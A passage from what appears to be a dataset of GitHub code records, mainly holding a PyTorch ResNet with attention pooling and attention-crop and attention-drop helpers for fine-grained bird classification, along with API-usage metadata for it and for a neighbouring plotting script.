"matplotlib.pyplot.plot", "line_number": 503, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 503, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 505, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 505, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 506, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 506, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 507, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 507, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 507, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 508, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 508, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 509, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 509, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 510, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 510, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 512, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 512, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 513, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 513, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 514, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 514, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 514, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 515, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 515, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 516, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 516, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 517, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 517, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 519, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 519, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 520, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 520, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 521, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 521, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 521, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 522, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 522, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 523, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 523, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 524, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 524, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 526, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 526, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 527, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 527, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 528, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 528, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 528, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 529, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 529, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 530, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 530, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 531, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 531, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 533, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 533, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 534, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 534, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 535, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 535, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 535, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 536, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 536, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 537, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 537, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 538, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 538, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 540, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 540, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 541, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 541, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 542, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 542, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 543, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 543, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 544, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 544, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 545, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 545, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 546, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 546, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 547, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 547, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 548, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 548, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 549, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 549, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 550, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 550, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 551, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 551, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 552, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 552, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 553, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 553, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 554, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 554, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 555, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 555, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 555, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 556, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 556, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 557, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 557, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 559, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 559, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 560, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 560, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 561, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 561, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 562, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 562, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 563, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 563, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 564, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 564, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 565, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 565, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 565, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 566, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 566, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 567, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 567, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 569, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 569, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 570, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 570, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 571, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 571, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 572, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 572, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 573, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 573, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 574, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 574, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 575, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 575, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 575, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 576, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 576, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 577, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 577, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 579, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 579, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 580, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 580, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 581, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 581, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 582, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 582, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 583, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 583, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 584, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 584, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 585, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 585, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 585, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 586, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 586, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 587, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 587, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 589, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 589, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 590, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 590, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 591, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 591, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 592, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 592, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 593, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 593, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 594, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 594, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 595, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 595, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 595, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 596, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 596, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 597, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 597, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_pdf.PdfPages", "line_number": 599, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 600, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 600, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 614, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 614, "usage_type": "name"}, {"api_name": "PySimpleGUI.Text", "line_number": 626, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 627, "usage_type": "call"}, {"api_name": "PySimpleGUI.Window", "line_number": 629, "usage_type": "call"}, {"api_name": "os.startfile", "line_number": 636, "usage_type": "call"}]}
+{"seq_id": "4057107701", "text": "import math\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.model_zoo as model_zoo\nimport random\n\n__all__ = ['ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101',\n 'resnet152']\n\n\nmodel_urls = {\n 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',\n 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',\n 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',\n 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',\n 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',\n}\n\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = nn.BatchNorm2d(planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass BasicConv2d(nn.Module):\n\n def __init__(self, in_channels, out_channels, **kwargs):\n super(BasicConv2d, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)\n self.bn = nn.BatchNorm2d(out_channels, eps=0.001)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n return F.relu(x, inplace=True)\n\nclass Attention(nn.Module):\n \n def __init__(self, in_channels, out_channels, **kwargs):\n super(Attention, self).__init__()\n self.conv1 = BasicConv2d(in_channels, 512, kernel_size=1)\n self.conv2 = BasicConv2d(512, out_channels, kernel_size=1)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n return x\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, layers, num_classes=1000, num_attentions=32, zero_init_residual=False):\n super(ResNet, self).__init__()\n self.inplanes = 64\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n # [64, 112, 112]\n self.layer1 = self._make_layer(block, 64, layers[0])\n # [64, 112, 112]\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n # [128, 56, 56]\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n # [256, 28, 28]\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n # [512, 14, 14]\n \n# self.attention = BasicConv2d(512 * block.expansion, num_attentions, kernel_size=1)\n self.attention = Attention(512 * block.expansion, num_attentions)\n \n# self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(512 * block.expansion * num_attentions, num_classes)\n\n self.register_buffer('center', torch.zeros(num_classes, num_attentions * 512 * block.expansion))\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n nn.BatchNorm2d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n \n def _bilinear_attention_pooling(self, x, a):\n x = x.view(x.size(0), x.size(1), -1)\n a = a.view(a.size(0), a.size(1), -1)\n x = torch.bmm(x, torch.transpose(a, 1, 2)) / (12**2)\n x = x.view(x.size(0), -1)\n x = torch.sqrt(x+1e-12)\n x = F.normalize(x)\n return x\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n att = self.attention(x)\n self.att_map = att\n \n x = self._bilinear_attention_pooling(x, att)\n f = x\n \n x = x.view(x.size(0), -1)\n x = self.fc(x*100)\n \n return x, f, att\n\n\ndef resnet18(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-18 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)\n if pretrained:\n model.load_state_dict(model_zoo.load_url(model_urls['resnet18']))\n return model\n\n\ndef resnet34(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-34 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(BasicBlock, [3, 4, 6, 3], **kwargs)\n if pretrained:\n model.load_state_dict(model_zoo.load_url(model_urls['resnet34']))\n return model\n\n\ndef resnet50(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-50 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)\n if pretrained:\n model_dict = model.state_dict()\n pretrained_dict = model_zoo.load_url(model_urls['resnet50'])\n model_dict.update(\n {k: v for k, v in pretrained_dict.items() if k in model_dict and v.size() == model_dict[k].size()})\n model.load_state_dict(model_dict)\n return model\n\n\ndef resnet101(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-101 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(Bottleneck, [3, 4, 23, 3], **kwargs)\n if pretrained:\n model_dict = model.state_dict()\n pretrained_dict = model_zoo.load_url(model_urls['resnet101'])\n model_dict.update(\n {k: v for k, v in pretrained_dict.items() if k in model_dict and v.size() == model_dict[k].size()})\n model.load_state_dict(model_dict)\n return model\n\n\ndef resnet152(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-152 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(Bottleneck, [3, 8, 36, 3], **kwargs)\n if pretrained:\n model.load_state_dict(model_zoo.load_url(model_urls['resnet152']))\n return model\n\n\ndef attention_crop(attention_maps):\n batch_size, num_parts, height, width = attention_maps.shape\n thetas = []\n for i in range(batch_size):\n attention_map = attention_maps[i]\n part_weights = torch.mean(torch.mean(attention_map, dim=1), dim=1)\n part_weights = torch.sqrt(part_weights)\n part_weights = part_weights / torch.sum(part_weights)\n selected_index = torch.multinomial(part_weights, 1, replacement=False, out=None)[0]\n\n mask = attention_map[selected_index, :, :]\n\n threshold = random.uniform(0.4, 0.6)\n itemindex = torch.nonzero(mask >= mask.max() * threshold)\n ymin = itemindex[:, 0].min().item() / height - 0.1\n ymax = itemindex[:, 0].max().item() / height + 0.1\n xmin = itemindex[:, 1].min().item() / width - 0.1\n xmax = itemindex[:, 1].max().item() / width + 0.1\n a = xmax - xmin\n e = ymax - ymin\n # crop weight=height\n pad = abs(a-e)/2.\n if a <= e:\n a = e\n xmin -= pad\n else:\n e = a\n ymin -= pad\n \n c = 2*xmin - 1 + a\n f = 2*ymin - 1 + e\n theta = np.asarray([[a, 0, c], [0, e, f]], dtype=np.float32)\n thetas.append(theta)\n thetas = np.asarray(thetas, np.float32)\n return thetas\n\n\ndef attention_drop(attention_maps):\n batch_size, num_parts, height, width = attention_maps.shape\n masks = []\n for i in range(batch_size):\n attention_map = attention_maps[i]\n part_weights = torch.mean(torch.mean(attention_map, dim=1), dim=1)\n part_weights = torch.sqrt(part_weights)\n part_weights = part_weights / torch.sum(part_weights)\n selected_index = torch.multinomial(part_weights, 1, replacement=False, out=None)[0]\n\n mask = attention_map[selected_index, :, :]\n # soft mask\n threshold = random.uniform(0.2, 0.5)\n mask = (mask < threshold * mask.max())\n masks.append(mask)\n# masks = np.asarray(masks, dtype=np.float32)\n masks = torch.stack(masks)\n masks = masks.type(torch.float32)\n masks = torch.unsqueeze(masks, dim=1)\n return masks\n\ndef mask2bbox(attention_maps):\n height = attention_maps.shape[2]\n width = attention_maps.shape[3]\n thetas = []\n for i in range(attention_maps.shape[0]):\n mask = attention_maps[i][0]\n max_activate = mask.max()\n min_activate = 0.1 * max_activate\n# mask = (mask >= min_activate)\n itemindex = torch.nonzero(mask >= min_activate)\n ymin = itemindex[:, 0].min().item() / height - 0.05\n ymax = itemindex[:, 0].max().item() / height + 0.05\n xmin = itemindex[:, 1].min().item() / width - 0.05\n xmax = itemindex[:, 1].max().item() / width + 0.05\n a = xmax - xmin\n e = ymax - ymin\n # crop weight=height\n pad = abs(a-e)/2.\n if a <= e:\n a = e\n xmin -= pad\n else:\n e = a\n ymin -= pad\n c = 2*xmin - 1 + a\n f = 2*ymin - 1 + e\n theta = np.asarray([[a, 0, c], [0, e, f]], dtype=np.float32)\n thetas.append(theta)\n thetas = np.asarray(thetas, np.float32)\n return thetas\n", "repo_name": "wangjie-ruc/FGVC-CUB200", "sub_path": "networks/ws_dan.py", "file_name": "ws_dan.py", "file_ext": "py", "file_size_in_byte": 12597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Conv2d", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 104, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 108, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 114, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 116, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 129, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 129, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 136, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 138, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 153, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 153, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 158, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 158, "usage_type": "name"}, {"api_name": "torch.nn.init.kaiming_normal_", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 159, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 159, "usage_type": "name"}, {"api_name": 